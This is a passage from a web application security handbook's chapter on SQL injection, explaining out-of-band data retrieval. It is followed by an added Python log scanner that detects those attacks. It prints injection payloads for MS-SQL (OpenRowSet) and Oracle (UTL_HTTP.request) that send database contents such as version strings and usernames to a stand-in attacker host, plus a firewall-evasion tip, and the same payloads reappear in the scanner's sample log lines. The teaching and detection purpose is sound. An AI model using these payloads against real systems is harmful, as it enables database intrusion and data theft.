The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws



274    Chapter 9    Injecting Code



query cannot be directly retrieved. Again, you need a means of retrieving the lost results of your injected query.

One method for retrieving data that is often effective in this situation is to use an out-of-band channel. Having achieved the ability to execute arbitrary SQL statements within the database, it is often possible to leverage some of the database's built-in functionality to create a network connection back to your own computer, over which you can transmit arbitrary data that you have gathered from the database.

The means of creating a suitable network connection are highly database-dependent, and different methods may or may not be available given the privilege level of the database user with which the application is accessing the database. Some of the most common and effective techniques for each type of database are described here.

MS-SQL

The OpenRowSet command can be used to open a connection to an external database and insert arbitrary data into it. For example, the following query will cause the target database to open a connection to the attacker's database and insert the version string of the target database into the table called foo:

    insert into openrowset('SQLOLEDB',
    'DRIVER={SQL Server};SERVER=wahh-attacker.com,80;UID=sa;PWD=letmein',
    'select * from foo') values (@@version)

Note that you can specify port 80, or any other likely value, to increase your chance of making an outbound connection through any firewalls.



Oracle

Oracle contains a large amount of default functionality that is accessible by low-privileged users and can be used to create an out-of-band connection. The UTL_HTTP package can be used to make arbitrary HTTP requests to other hosts. UTL_HTTP contains rich functionality and supports proxy servers, cookies, redirects, and authentication. This means that an attacker who has compromised a database on a highly restricted internal corporate network may be able to leverage a corporate proxy to initiate outbound connections to the Internet.

In the following example, UTL_HTTP is used to transmit the results of an injected query to a server controlled by the attacker:

    https://wahh-app.com/employees.asp?EmpNo=7521'||UTL_HTTP.request('wahh-attacker.com:80/'||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--
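
As an added example (not from the book), the following Python script shows the defensive side of the two techniques above: it parses web-server access log lines (Common Log Format is assumed), URL-decodes the query string, flags requests carrying the OpenRowSet and UTL_HTTP.request indicators, and extracts the callback host:port so it can be matched against egress or proxy logs from the database server. The log lines are constructed to mirror the chapter's two examples and are not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the two out-of-band channels described above (case-insensitive,
# tolerant of whitespace between tokens).
OOB_PATTERNS = {
    "mssql_openrowset": re.compile(r"openrowset\s*\(", re.I),
    "oracle_utl_http": re.compile(r"utl_http\s*\.\s*request", re.I),
}
# Host:port the payload names as its callback, e.g. 'wahh-attacker.com:80' or
# SERVER=wahh-attacker.com,80 (both forms occur in the chapter's examples).
CALLBACK_RE = re.compile(
    r"(?:^|[^a-z0-9.-])(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)+)[,:](?P<port>\d{1,5})", re.I)
# Minimal Common Log Format parser (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def decode_query(path, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    prev, cur = None, path
    for _ in range(rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur

def scan_line(line):
    """Return a finding for one log line, or None if no indicator matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("path"))
    hits = [name for name, pat in OOB_PATTERNS.items() if pat.search(decoded)]
    if not hits:
        return None
    cb = CALLBACK_RE.search(decoded)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
            "indicators": hits, "decoded": decoded,
            "callback": f"{cb.group('host')}:{cb.group('port')}" if cb else None}

def scan_log(lines):
    return [f for f in (scan_line(l) for l in lines) if f]

# Constructed sample lines (not real traffic); payloads mirror the chapter's examples.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Sep/2007:15:13:00 +0000] "GET /employees.asp?EmpNo=7521 HTTP/1.1" 200 512',
    '10.0.0.9 - - [14/Sep/2007:15:13:07 +0000] "GET /employees.asp?EmpNo=7521%27||UTL_HTTP.request(%27wahh-attacker.com:80/%27||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [14/Sep/2007:15:13:20 +0000] "GET /search.asp?q=1;insert%20into%20OpenRowSet(%27SQLOLEDB%27,%27SERVER=wahh-attacker.com,80%27,%27select%20*%20from%20foo%27)%20values(@@version)-- HTTP/1.1" 500 0',
]
```

Running scan_log(SAMPLE_LOG) leaves the first line clean and flags the other two with their decoded payload and the callback wahh-attacker.com:80, which is the value to hunt for in outbound-connection logs from the database host and to block at the egress firewall or proxy.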



